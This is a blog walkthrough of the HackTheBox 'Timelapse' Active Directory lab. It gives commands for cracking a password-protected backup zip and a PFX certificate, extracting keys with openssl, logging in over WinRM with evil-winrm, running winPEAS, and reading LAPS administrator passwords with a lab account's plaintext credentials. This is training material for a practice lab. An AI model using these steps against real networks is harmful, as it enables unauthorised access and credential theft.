Hacking Articles|Raj Chandel's Blog: Timelapse HackTheBox Walkthrough

Summary

Timelapse is a HTB Active Directory machine is an easy machine but as the concept of initial compromise is unique therefore, I believe it should categories as Intermediate. By solving this lab I learn how can an attacker steal CA certificate to perform lateral moment.

Table of content

Initial Access

· Nmap

· SMB-client

· Openssl

· Winrm

Privilege Escalation

· WinPeas

· Credential Dumping

· Abusing LAPS

Initial Access

Let’s deep dive into the time.

Nmap

From the nmap scan, we can see that this is a Window Server more precisely a domain controller since we have DNS, LDAP, Kerberos and SMB ports open. Also WinRM ( Windows Remote Management) port 5986 is present.

SMBClient

Let’s use smb client to find if there are any share folders are available for anonymous login. Indeed, there is a sharing enable with the name of “Shares”.

Now we try to connect to that folder using smb client and browse the directory to find other sub folders. The winrm_backup.zip is actually password protected. So we need to crack it.

In our scenario, we used fcrackzip to crack the winrm_backup file using the wordlist rockyou.txt.

fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt

Once we have cracked the password, we can use it to unzip the file. Once extracted, we find a .pfx file called: legacy_dev_auth.pfx. PFX files are actually digital certificates that contains both the SSL certificate public and private keys.

unzip winrm_backup.zip

pfx2john legacyy_dev_auth.pfx >pfxhash

Openssl

Now, we are going to convert that pfx file to the hash and crack it using the hash using John to get the private key and the pem key. As you can see, the password is thuglegacy.

We will try to open the certificate using openssl and as we can see it is a Microsoft Software Key Storage Provider. We can extract the certificate and private key.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

Once the private key available, we can use this key to login on the box.

We will use evil-winrm to login using both the pem certificate and pem private key. Instead of password we can login with the keys also.

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S -r timelapse

Privilege Escalation

Now we have a shell on the box. It seems we don’t have anything in the document library. Let’s browse to the desktop library to see if we can find any flag. Indeed we have a user.txt flag on the desktop.

Now we will use updog to upload winPEASx64.exe on the server.

Let’s download updog. Another alternative, is to use python httpSimpleServer but in our scenario we are using updog.

WinPeas.exe

Once installed, lets run updog on 80. As shown below, updog is running on port 80 now.

Then on the server we download the winPEASx64.exe using wget command. Once download is complete, lets execute the winPEASx64.exe

Let’s read the ConsoleHost_History.txt file and see what information we can extract from it.

Credential Dumping- LAPS

As we can see from the file, the username is svc_deploy and the password has been assigned to the variable p. now let’s verify in which group the user svc_deploy is a member of. It is a member of the LAPS_Readers group. LAPS stands for Local Administrator Password Solution. It ramdomise all the password for all local machines so that you cannot execute passthehash attack. However, it stores the password on active directory itself and only members of LAPS_Readers can read the password.

Let’s check all users available on the box by using the command net users. We found a user account named svc_deploy. Let’s check in which group membership this is located. Its in the LAPS_Readers group.

Now we can try to connect using evil-winrm using the username and password from the consolehost_history.txt file. And the password is in the ‘ms-Mcs-admpwd’

evil-winrm -i 10.129.227.105 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Get-ADComputer DC01 -property 'ms-mcs-admpwd'